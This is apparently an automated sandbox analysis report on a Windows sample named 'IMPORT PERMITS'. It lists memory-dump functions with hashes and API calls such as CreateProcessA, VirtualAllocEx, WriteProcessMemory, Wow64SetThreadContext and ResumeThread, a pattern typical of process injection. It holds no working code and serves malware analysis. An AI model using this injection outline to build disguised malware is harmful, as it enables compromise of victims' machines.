                                                                                                                                Signature Coverage:1.8%
                                                                                                                                Total number of Nodes:164
                                                                                                                                Total number of Limit Nodes:7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: cd6025995cef4826a8be1342d894728b66ce20c46861efe8e682451cdff74f5c
                                                                                                                                • Instruction ID: 6b3ed9c189018d11a4f21dfe7bb43ee2d9a58c0fdd4b1d5142df4fea273cab37
                                                                                                                                • Opcode Fuzzy Hash: cd6025995cef4826a8be1342d894728b66ce20c46861efe8e682451cdff74f5c
                                                                                                                                • Instruction Fuzzy Hash: EAC1AA717017048FDB2AEB76C5907AEB7EAAF8D300F554469D18ACB3A0DB35E901CB51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9d60d19271d44a345f109e5d5f1c8952db879b1855f557e284bbd641b4da14df
                                                                                                                                • Instruction ID: 1afd355357aa03c50f3f04783bb94c7e5b9bbf95631dffe603c6ac52e11c4a03
                                                                                                                                • Opcode Fuzzy Hash: 9d60d19271d44a345f109e5d5f1c8952db879b1855f557e284bbd641b4da14df
                                                                                                                                • Instruction Fuzzy Hash: E1610675D44229CBDB25CF66C8407E9BBBABF89300F11E5AAD40DA7245EB705AC5CF40

                                                                                                                                Control-flow Graph (figure not reproduced; legend: Executed / Not Executed)
                                                                                                                                APIs
                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02933036
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 963392458-0
                                                                                                                                • Opcode ID: d4194f32067a893b35f8d0ef6fc80b9dfc43f8c5760452b016d688799d3140be
                                                                                                                                • Instruction ID: 1f3ef5752110c565a64b4dbc11c393e06a296e90b3908319e55b5d704afe06ac
                                                                                                                                • Opcode Fuzzy Hash: d4194f32067a893b35f8d0ef6fc80b9dfc43f8c5760452b016d688799d3140be
                                                                                                                                • Instruction Fuzzy Hash: 9EA15C71D0021ADFEF21CFA8C8817EDBBB6BF48314F1485A9E848A7250DB759985CF91

                                                                                                                                Control-flow Graph (figure not reproduced; legend: Executed / Not Executed)
                                                                                                                                APIs
                                                                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 02933036
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 963392458-0
                                                                                                                                • Opcode ID: 87d5d57693b3f8a89adbaf6c5bfb6ebc248bf17de4f03520a69e943984074a93
                                                                                                                                • Instruction ID: 6c7123cd971cadb660e1a3e77be6875e4b31f64d8756d6516912be9274253ee6
                                                                                                                                • Opcode Fuzzy Hash: 87d5d57693b3f8a89adbaf6c5bfb6ebc248bf17de4f03520a69e943984074a93
                                                                                                                                • Instruction Fuzzy Hash: 8C916D71D0021ADFDF21CFA8C8817EDBBB6BF48314F1485A9E848A7250DB749985CF91

                                                                                                                                Control-flow Graph (figure not reproduced; legend: Executed / Not Executed)
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0104B27E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1753995969.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1040000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: 59cf59509817c17265f27cba5f75f631a07c85140e05bd959446f8eed25689b4
                                                                                                                                • Instruction ID: 67c3a99e36d186e88e48b08739d12a4f21cb9c8dfbc39f34ecff05ff55031bb0
                                                                                                                                • Opcode Fuzzy Hash: 59cf59509817c17265f27cba5f75f631a07c85140e05bd959446f8eed25689b4
                                                                                                                                • Instruction Fuzzy Hash: DB8145B0A00B058FEB64DF29D48579ABBF1FF88304F008A6DE49AD7A50D775E945CB90

                                                                                                                                Control-flow Graph (figure not reproduced; legend: Executed / Not Executed)
                                                                                                                                APIs
                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 010459C9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1753995969.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1040000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                • Opcode ID: 89fd74c5871cb632ecf7498c879b209ae62b2fd7cff5ad00a52a639f524d7b19
                                                                                                                                • Instruction ID: 994c21f7f6b816a47a9d8089a997dfef0bd61ed053dd02750a53623ee96801e0
                                                                                                                                • Opcode Fuzzy Hash: 89fd74c5871cb632ecf7498c879b209ae62b2fd7cff5ad00a52a639f524d7b19
                                                                                                                                • Instruction Fuzzy Hash: 4C41DFB0C0071DCBDB24DFA9C884A9EBBF5BF49304F2480AAD448AB255DB756945CF91

                                                                                                                                Control-flow Graph (figure not reproduced; legend: Executed / Not Executed)
                                                                                                                                APIs
                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 010459C9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1753995969.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1040000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Create
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                • Opcode ID: 39edcbe8200799f45ad4a5bf2426d5159f18062ddd56b5cf8d813bef3b9f33eb
                                                                                                                                • Instruction ID: cff165e17bd8da782d79939c4b4d594fa2701f8db6ae7e7a5746b8c9e10003a1
                                                                                                                                • Opcode Fuzzy Hash: 39edcbe8200799f45ad4a5bf2426d5159f18062ddd56b5cf8d813bef3b9f33eb
                                                                                                                                • Instruction Fuzzy Hash: 4141CEB1C00719CFDB24CFA9C88469EBBF5BF49304F2480AAD448AB255DB756989CF91

                                                                                                                                Control-flow Graph (figure not reproduced; legend: Executed / Not Executed)
                                                                                                                                APIs
                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02932C08
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                • Opcode ID: 37c1d9332b56b41ac1a90f133cd3ddd1c36282b82e904cd794e6018b51a272f6
                                                                                                                                • Instruction ID: 5f8b4c70d3647389cfae3ba04c9338b5fa165f9a52bcc844cb3154001b75514e
                                                                                                                                • Opcode Fuzzy Hash: 37c1d9332b56b41ac1a90f133cd3ddd1c36282b82e904cd794e6018b51a272f6
                                                                                                                                • Instruction Fuzzy Hash: A9215AB1D003599FDB10CFA9C981BDEBBF5FF48310F108429E918A7250C7789984CBA4

                                                                                                                                Control-flow Graph (figure not reproduced; legend: Executed / Not Executed)
                                                                                                                                APIs
                                                                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02932C08
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                • Opcode ID: fec92a092834c406b05b25bb2d0a93579cb4c56c8070b381ced42dfc7c3db50d
                                                                                                                                • Instruction ID: 8538fee9212332ec1b717522dd24198e6cb735e5332159f266b9ae33e1307fc4
                                                                                                                                • Opcode Fuzzy Hash: fec92a092834c406b05b25bb2d0a93579cb4c56c8070b381ced42dfc7c3db50d
                                                                                                                                • Instruction Fuzzy Hash: 1F2136B1D003599FDB10DFA9C985BDEBBF5FF48314F10842AE958A7250C778A944CBA4

                                                                                                                                Control-flow Graph (figure not reproduced; legend: Executed / Not Executed)
                                                                                                                                APIs
                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02932CE8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                • Opcode ID: d5b6545ea26bc20a8c0ac80707b0e1663d3e0e7a8290433a7f43f3f5bdf774ca
                                                                                                                                • Instruction ID: e21730b8f1d14ff5f6a4066f48c5016807b29278d38e50615239aa97b39b1de6
                                                                                                                                • Opcode Fuzzy Hash: d5b6545ea26bc20a8c0ac80707b0e1663d3e0e7a8290433a7f43f3f5bdf774ca
                                                                                                                                • Instruction Fuzzy Hash: A92128B1D003599FDB10DFAAC981ADEFBF5FF48310F108429E958A7250C7759944CBA5

                                                                                                                                Control-flow Graph (figure not reproduced; legend: Executed / Not Executed)
                                                                                                                                APIs
                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02932A5E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 983334009-0

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 836 104bda0-104d9a4 DuplicateHandle 838 104d9a6-104d9ac 836->838 839 104d9ad-104d9ca 836->839 838->839
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0104D8D6,?,?,?,?,?), ref: 0104D997
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1753995969.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1040000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0

                                                                                                                                Control-flow Graph

                                                                                                                                control_flow_graph 862 104d909-104d9a4 DuplicateHandle 863 104d9a6-104d9ac 862->863 864 104d9ad-104d9ca 862->864 863->864
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0104D8D6,?,?,?,?,?), ref: 0104D997
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1753995969.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1040000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                APIs
                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 02932CE8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                APIs
                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02932A5E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 983334009-0
                                                                                                                                APIs
                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02932B26
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                APIs
                                                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02932B26
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ResumeThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 947044025-0
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ResumeThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 947044025-0
                                                                                                                                APIs
                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0293517D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePost
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 410705778-0
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0104B27E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1753995969.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1040000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                APIs
                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0293517D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePost
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 410705778-0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1750608793.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_c9d000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: dbfad5f564a9b39ce39b97aa77b911773a55c4bb73f072a6fe4b2a805a425c2c
                                                                                                                                • Instruction ID: 750eebbe4c38566bae94a8da0a5159724078b91378f1d74524d2f06ec22afdd2
                                                                                                                                • Opcode Fuzzy Hash: dbfad5f564a9b39ce39b97aa77b911773a55c4bb73f072a6fe4b2a805a425c2c
                                                                                                                                • Instruction Fuzzy Hash: DF212871500204DFDF05DF14D9C8B26BF65FB94314F20C169E90A5B256C336E856CAA2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1752182862.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_cad000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a8393099674c49fb96a41f8784a5ccef1aa30554b99bead597d4100bc0bd9717
                                                                                                                                • Instruction ID: 56733ca087c5bc225860a6b21fbba5bffba9d26a8b55264f6c3aa5e1912d0bd7
                                                                                                                                • Opcode Fuzzy Hash: a8393099674c49fb96a41f8784a5ccef1aa30554b99bead597d4100bc0bd9717
                                                                                                                                • Instruction Fuzzy Hash: C8210471604205DFCB14DF24D9C4B26BFA5FB89318F20C56DE84B4B696C33AD847CA61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1752182862.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_cad000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 79b948d4b545a92f1e52e9811a960032c207a2cc59fce1749b1a007e69f3cfb6
                                                                                                                                • Instruction ID: 534f257ce38c7e292d58b22553659ce40f3ae58202cb340c4ed35e127e3e13a4
                                                                                                                                • Opcode Fuzzy Hash: 79b948d4b545a92f1e52e9811a960032c207a2cc59fce1749b1a007e69f3cfb6
                                                                                                                                • Instruction Fuzzy Hash: B0212671504205EFDB05DF14DAC4B2ABBA5FB85318F20C6BDE90B4B696C33ADC46CA61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1752182862.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_cad000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b2df24d6a3c71b0c7a2816efabcf6ff5d07f18e2156047a8e5bd0f159139eba3
                                                                                                                                • Instruction ID: 2ccfcf7784d3deccbb47de03c7fbbb030f8cec2ab394e471c542e5530f887bd8
                                                                                                                                • Opcode Fuzzy Hash: b2df24d6a3c71b0c7a2816efabcf6ff5d07f18e2156047a8e5bd0f159139eba3
                                                                                                                                • Instruction Fuzzy Hash: 382153755093808FDB12CF24D594715BF71EB46318F28C5DAD84A8F6A7C33A990ACB62
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1750608793.0000000000C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C9D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_c9d000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                • Instruction ID: 65a2e48663c3a310bb65df39903668c17114a8636eeeed06f782801e7134a14c
                                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                • Instruction Fuzzy Hash: C8110372404240CFCF02CF00D5C4B16BF71FB94324F24C2A9D80A1B256C33AE95ACBA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1752182862.0000000000CAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CAD000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_cad000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                • Instruction ID: 1dda229f5ca37f94173b53c16887a253354207050fe3722bece9ecb5e7eaed9d
                                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                • Instruction Fuzzy Hash: CA11BB75504284DFCB02CF10C5C4B15BBA1FB85318F24C6AAD84A4B6A6C33AD84ACB61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: de7df42e2b63ce190c402cf17d549464bc472d0624e041c72cdb5e346b23a119
                                                                                                                                • Instruction ID: 4cb1b6d5b6674824f12cbe3d896dcca9dc767126b086c0bcea03c05d0d08c885
                                                                                                                                • Opcode Fuzzy Hash: de7df42e2b63ce190c402cf17d549464bc472d0624e041c72cdb5e346b23a119
                                                                                                                                • Instruction Fuzzy Hash: A9E1E674E041198FDB14DFA9C5809AEFBF2FF89304F248169E819AB35AD731A941CF61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d963d5ceda698730bfab525febd08f567b42a5048f2670ca5b5827d4588c85ac
                                                                                                                                • Instruction ID: 00a65496f1d9916474459b435d15c65f1e0d1a4058966ec34f8c090054386a6c
                                                                                                                                • Opcode Fuzzy Hash: d963d5ceda698730bfab525febd08f567b42a5048f2670ca5b5827d4588c85ac
                                                                                                                                • Instruction Fuzzy Hash: 45E1E874E041198FDB14DFA9C580AAEFBF2BF89304F24D169E418AB356DB31A941CF61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e7bbcfefa3e1a15b25a1b8df211beef7fefb9b394088773690a7491f39b8ebca
                                                                                                                                • Instruction ID: be290fe19c77e464866a7fa672965f4b7566d5be81cd3b1b896816d6b32766cd
                                                                                                                                • Opcode Fuzzy Hash: e7bbcfefa3e1a15b25a1b8df211beef7fefb9b394088773690a7491f39b8ebca
                                                                                                                                • Instruction Fuzzy Hash: 37E1F974E041198FDB14DFA9C9809AEFBF2FF89304F248169E415AB35AD731A941CFA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8b8598ad6811f7cde8a5b46901e097064ce238f4205152edad851c568480538e
                                                                                                                                • Instruction ID: 269c8478e13c9a7028c6c5d16ff21d54f64d2cad8f26b597dd13732ae0c38c34
                                                                                                                                • Opcode Fuzzy Hash: 8b8598ad6811f7cde8a5b46901e097064ce238f4205152edad851c568480538e
                                                                                                                                • Instruction Fuzzy Hash: 99E1E774E042198FDB15DFA9C5809AEFBF2BF89304F248169E815AB356D730AD41CFA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1753995969.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_1040000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f424e2670205782a233c9fe68f773613ad61b464de47b4d1a638a26779073bf8
                                                                                                                                • Instruction ID: cce98c1d3d94cb721fb2fbd64cf39e252ad1c4b9e966257836c99c42d119e681
                                                                                                                                • Opcode Fuzzy Hash: f424e2670205782a233c9fe68f773613ad61b464de47b4d1a638a26779073bf8
                                                                                                                                • Instruction Fuzzy Hash: 89A16DB2E002168FCF15DFB9C5804DEBBB2FF85300B2585BAE941AB265DB75E915CB40
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.1754724630.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_2930000_IMPORT PERMITS.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 386d45fb3ddb4e531ba78ec2d34d30bdacefe0d0cf69dd756b1da226522abd09
                                                                                                                                • Instruction ID: 0cc34caf82de2d4c5b40322b948090fac7350d90cd4b5a5a4b87dc146c3ffffb
                                                                                                                                • Opcode Fuzzy Hash: 386d45fb3ddb4e531ba78ec2d34d30bdacefe0d0cf69dd756b1da226522abd09
                                                                                                                                • Instruction Fuzzy Hash: 61516074E042598FCB05CFA9C9805AEFBF2FF89304F2481AAD418AB356D7309946CF61

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:1.2%
                                                                                                                                Dynamic/Decrypted Code Coverage:5%
